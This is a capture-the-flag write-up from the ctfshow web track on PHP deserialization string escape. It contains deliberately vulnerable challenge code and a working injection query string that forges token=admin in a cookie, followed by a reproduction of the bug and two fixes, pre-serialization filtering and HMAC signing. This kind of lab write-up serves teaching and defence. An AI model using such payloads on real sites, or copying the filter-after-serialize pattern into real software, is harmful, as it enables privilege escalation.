PHP deserialization string escape
I have recently been working through the deserialization and PHP-features parts of the ctfshow web beginner track, so let me talk about deserialization string escape.
```php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-03 02:37:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];
if(isset($f) && isset ($m) && isset($t)){
    $msg = new message($f,$m,$t);
    // The filter runs on the already serialized string: replacing a 4-byte
    // word with a 5-byte one leaves the s:N: length prefixes stale.
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}
highlight_file(__FILE__);
```
The challenge code is shown above. All it does is serialize an object to generate a cookie. There was no flag on this page, but the comments mention message.php, so I visited message.php:
```php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-03 15:13:03
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-03 15:17:17
# @email: [email protected]
# @link: https://ctfer.com
*/
highlight_file(__FILE__);
include('flag.php');
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
if(isset($_COOKIE['msg'])){
    // The cookie written by index.php is decoded and unserialized as-is.
    $msg = unserialize(base64_decode($_COOKIE['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }
}
```
That is the code I found: the cookie generated earlier is unserialized, and to read the flag token must be admin. The earlier code gives no way to set token to admin by direct assignment, so we have to use the parameters we can pass to splice our own fragment into the PHP serialized string and supply token's value that way. First, write the exp:
```php
<?php
class message{
    public $token="admin";
}
$a=new message();
// Prints O:7:"message":1:{s:5:"token";s:5:"admin";}
echo serialize($a);
```
During unserialize, PHP reads the string that follows according to the length given after s.
The O stands for an object, and the 4 is the number of properties that object has. We can pass parameters like these:
?f=1&m=1&t=1fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}
In index.php, whenever fuck is matched it is replaced with loveU; passing the value this way makes the token/admin pair in the back half of the payload push out the token/user pair, completing the deserialization string escape.
The serialized string before replacement:
```
O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"1";s:2:"to";s:136:"1fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}";s:5:"token";s:4:"user";}
```
PHP treats the part `s:136:"1fuck...fuck";s:5:"token";s:5:"admin";}";` as one unit: the 136 bytes declared for to cover the whole injected value, tail included. After str_replace each fuck becomes loveU, one byte longer, so the same 136 bytes now cover only the leading 1 plus the 27 loveU; the tail `";s:5:"token";s:5:"admin";}` is then parsed as the real token property and closes the object, and the original `";s:5:"token";s:4:"user";}` is left over as trailing data that unserialize ignores.
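The following is an added example, not code from the challenge or from ctfshow: it reproduces the length mismatch that str_replace() on a serialized string causes, then shows two fixes, filtering each field before serializing and signing the cookie. The helper names (`sign_cookie`, `verify_cookie`, `$clean`) and the server secret `$key` are assumptions for this example.

```php
<?php
// Added example (not the challenge's own code). Shows why filtering after
// serialize() lets a string escape, and two ways to prevent it.
class message {
    public $from;
    public $msg;
    public $to;
    public $token = 'user';
    public function __construct($f, $m, $t) {
        $this->from = $f; $this->msg = $m; $this->to = $t;
    }
}

// Constructed input: 'to' carries one "fuck" per byte of the fake tail,
// so every replacement grows the value by exactly one byte.
$tail = '";s:5:"token";s:5:"admin";}';
$t = '1' . str_repeat('fuck', strlen($tail)) . $tail;
$msg = new message('1', '1', $t);

// Vulnerable order: replace AFTER serialize, so s:136: no longer matches
// the real length and the tail escapes its string; token reads as admin.
$bad = str_replace('fuck', 'loveU', serialize($msg));
var_dump(unserialize($bad)->token);

// Fix 1: filter every field BEFORE serializing. The s:N: prefix is then
// computed on the final value, so nothing can escape its own string.
$clean = fn(string $s): string => str_replace('fuck', 'loveU', $s);
$good = serialize(new message($clean('1'), $clean('1'), $clean($t)));
var_dump(unserialize($good)->token);

// Fix 2: sign the cookie so a tampered blob is rejected before
// unserialize() ever sees it ($key is an assumed server-side secret).
$key = 'assumed-server-secret';
function sign_cookie(string $data, string $key): string {
    return base64_encode($data) . '.' . hash_hmac('sha256', $data, $key);
}
function verify_cookie(string $cookie, string $key): ?string {
    [$b64, $mac] = explode('.', $cookie, 2) + [null, null];
    $data = base64_decode((string)$b64, true);
    if ($data === false || !hash_equals(hash_hmac('sha256', $data, $key), (string)$mac)) {
        return null;
    }
    return $data;
}
$cookie = sign_cookie($good, $key);
var_dump(verify_cookie($cookie, $key) === $good);   // intact cookie accepted
var_dump(verify_cookie($cookie . 'x', $key));       // tampered cookie rejected
```

Even with the HMAC in place, unserialize() on client-supplied data is only as safe as the classes available to it; the signature stops tampering, it does not make unserialize() itself safe.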